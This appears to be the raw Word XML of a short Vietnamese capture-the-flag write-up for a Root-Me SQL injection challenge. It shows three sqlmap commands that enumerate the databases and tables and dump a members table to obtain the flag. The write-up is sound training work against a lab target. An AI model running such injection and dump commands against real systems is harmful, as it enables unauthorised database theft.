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D4FB" w14:textId="7A5F84DC" w:rsidR="00623829" w:rsidRDefault="00623829">
      <w:r>
        <w:t>Đầu tiên bài này vào thì khi thực hiện ‘ sẽ báo lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFF356" w14:textId="2D3A9C38" w:rsidR="006A20F8" w:rsidRDefault="00623829">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38473CD8" wp14:editId="2A8BA57A">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1145168414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68414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663A" w14:textId="41D4A5A8" w:rsidR="00F91E67" w:rsidRDefault="00F91E67">
      <w:r>
        <w:t>Ta sẽ thực hiện tấn công lấy dữ liệu db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149CD57" w14:textId="1C9B01CE" w:rsidR="00623829" w:rsidRDefault="004B359A" w:rsidP="004B359A">
      <w:r w:rsidRPr="004B359A">
        <w:t>python sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch34/?action=contents&amp;order=ASC" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C14271" w14:textId="3AA86A3D" w:rsidR="004B359A" w:rsidRDefault="004B359A" w:rsidP="004B359A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A007116" wp14:editId="37356445">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="193340878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08783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DFD4" w14:textId="706763C8" w:rsidR="00F91E67" w:rsidRDefault="00F91E67" w:rsidP="004B359A">
      <w:r>
        <w:t>Ta thấy có bảng public là thực hiện được ta sẽ thực hiện tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BE2982" w14:textId="5C80E211" w:rsidR="004B359A" w:rsidRDefault="004B359A" w:rsidP="004B359A">
      <w:r w:rsidRPr="004B359A">
        <w:lastRenderedPageBreak/>
        <w:t>python sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch34/?action=contents&amp;order=ASC" -D public --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D34E8" w14:textId="417F1706" w:rsidR="004B359A" w:rsidRDefault="004B359A" w:rsidP="004B359A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A313C0" wp14:editId="508AC5FD">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="44773522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35223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EC93" w14:textId="3B9552A2" w:rsidR="009B670A" w:rsidRDefault="009B670A" w:rsidP="009B670A">
      <w:r>
        <w:t xml:space="preserve">Ta thấy có bảng </w:t>
      </w:r>
      <w:r w:rsidRPr="004B359A">
        <w:t>m3mbr35t4bl3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06810D61" w14:textId="663CDD5A" w:rsidR="009B670A" w:rsidRDefault="009B670A" w:rsidP="004B359A">
      <w:r>
        <w:t>Ta sẽ thực hiện dump toàn bộ data từ bảng này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70ECC1" w14:textId="007C0402" w:rsidR="004B359A" w:rsidRDefault="004B359A" w:rsidP="004B359A">
      <w:r w:rsidRPr="004B359A">
        <w:t>python sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch34/?action=contents&amp;order=ASC" -D public -T m3mbr35t4bl3 --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E4BA4D" w14:textId="30C13643" w:rsidR="004B359A" w:rsidRDefault="009B670A" w:rsidP="004B359A">
      <w:r>
        <w:t xml:space="preserve">ta có được flag </w:t>
      </w:r>
      <w:r w:rsidR="004B359A" w:rsidRPr="004B359A">
        <w:t>1a2BdKT5DIx3qxQN3UaC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27830428" w14:textId="4CA7ABB1" w:rsidR="004B359A" w:rsidRDefault="004B359A" w:rsidP="004B359A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57727D31" wp14:editId="401FB77F">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4165828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8289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7A"/>
    <w:rsid w:val="004B359A"/>
    <w:rsid w:val="00623829"/>
    <w:rsid w:val="006A20F8"/>
    <w:rsid w:val="009B670A"/>
    <w:rsid w:val="00B6347A"/>
    <w:rsid w:val="00F9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0167"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{29BA4FAE-65F6-4F7B-B2BB-9AD74D2D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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-07T17:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-07T18:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>